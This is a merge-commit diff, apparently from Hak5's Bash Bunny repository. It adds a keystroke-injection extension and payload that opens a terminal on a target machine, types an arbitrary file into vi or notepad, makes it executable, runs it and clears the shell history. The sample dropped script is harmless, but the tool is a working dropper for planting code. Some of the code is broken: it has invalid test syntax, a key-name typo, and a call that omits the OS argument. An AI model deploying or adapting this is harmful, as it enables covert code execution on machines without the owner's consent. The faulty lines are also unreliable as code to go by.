Merge pull request #318 from bg-wa/drop

[Extension + Payload] The Ol'Drop'n'Run
hak5 · Sep 5, 2024 · 8d901a0 · 8d901a0
2 parents 14fa7c4 + a479964
commit 8d901a0
Show file tree

Hide file tree

Showing 3 changed files with 140 additions and 0 deletions.
diff --git a/payloads/extensions/drop.sh b/payloads/extensions/drop.sh
@@ -0,0 +1,103 @@
+#!/bin/bash
+#
+# DROP v1 by bg-wa
+# Simplifies dropping files from HID attacks for LINUX
+# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
+#
+# Example:
+# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
+source ./run.sh
+
+function DROP() {
+    os=$1
+    source=$2
+    destination=$3
+    overwrite=$4
+    executable=$5
+
+    case "$os" in
+      WIN)
+             RUN WIN powershell
+         ;;
+      OSX)
+             RUN OSX terminal
+         ;;
+      UNITY)
+             RUN UNITY terminal
+         ;;
+      LINUX)
+             RUN LINUX terminal
+         ;;
+      *)
+             RUN UNITY terminal
+         ;;
+   esac
+
+    QUACK DELAY 1000
+
+    if "$overwrite" == "true"
+    then
+        case "$os" in
+          WIN)
+                 QUACK STRING del "$destination"
+             ;;
+          *)
+                 QUACK STRING rm "$destination"
+             ;;
+        esac
+        QUACK ENTER
+        QUACK DELAY 500
+    fi
+
+    case "$os" in
+      WIN)
+            QUACK STRING fsutil file createnew "$destination"
+            QUACK ENTER
+            QUACK DELAY 500
+            QUACK STRING notepad.exe "$destination"
+            QUACK ENTER
+            QUACK DELAY 1000
+         ;;
+      *)
+            QUACK STRING vi "$destination"
+            QUACK ENTER
+            QUACK DELAY 500
+            QUACK STRING i
+         ;;
+    esac
+
+    while IFS= read -r data
+    do
+        QUACK STRING "$data"
+        QUACK ENTER
+    done < "$source"
+
+    QUACK DELAY 500
+
+    case "$os" in
+      WIN)
+             QUACK CTRL s
+             QUACK CRTL x
+         ;;
+      *)
+            QUACK ESC
+            QUACK ENTER
+            QUACK STRING :wq
+            QUACK ENTER
+
+            if "$executable" == "true"
+            then
+                 QUACK STRING chmod +x "$destination"
+                QUACK ENTER
+                QUACK DELAY 500
+            fi
+
+            QUACK STRING history -c
+            QUACK ENTER
+            QUACK STRING exit
+            QUACK ENTER
+         ;;
+    esac
+}
+
+export -f DROP
diff --git a/payloads/library/execution/drop_n_run/fuse.sh b/payloads/library/execution/drop_n_run/fuse.sh
@@ -0,0 +1,7 @@
+#!/bin/bash
+
+# Wake up and do something productive here instead...
+sleep 10
+
+# boom!!
+firefox "http://hak5.org"
diff --git a/payloads/library/execution/drop_n_run/payload.txt b/payloads/library/execution/drop_n_run/payload.txt
@@ -0,0 +1,30 @@
+#!/bin/bash
+#
+# Title:         The Ol'Drop'n'Run
+# Author:        bg-wa
+# Version:       1.0
+# Category:      HID
+# Target:        UNITY
+# Attackmodes:   HID
+#
+# Quick HID only attack to write a file to target machine and open
+#
+# | Attack Stage        | Description                              |
+# | ------------------- | ---------------------------------------- |
+# | SETUP               | Open vi                                  |
+# | ATTACK              | Writing files                            |
+# | FINISH              | Payload Dropped & ran (remove the bunny) |
+#
+
+ATTACKMODE HID
+LED SETUP
+
+source_script=/root/udisk/payloads/$SWITCH_POSITION/fuse.sh
+target_script=\~/fuse.sh
+
+LED ATTACK
+
+DROP $source_script $target_script true true
+RUN UNITY $target_script
+
+LED FINISH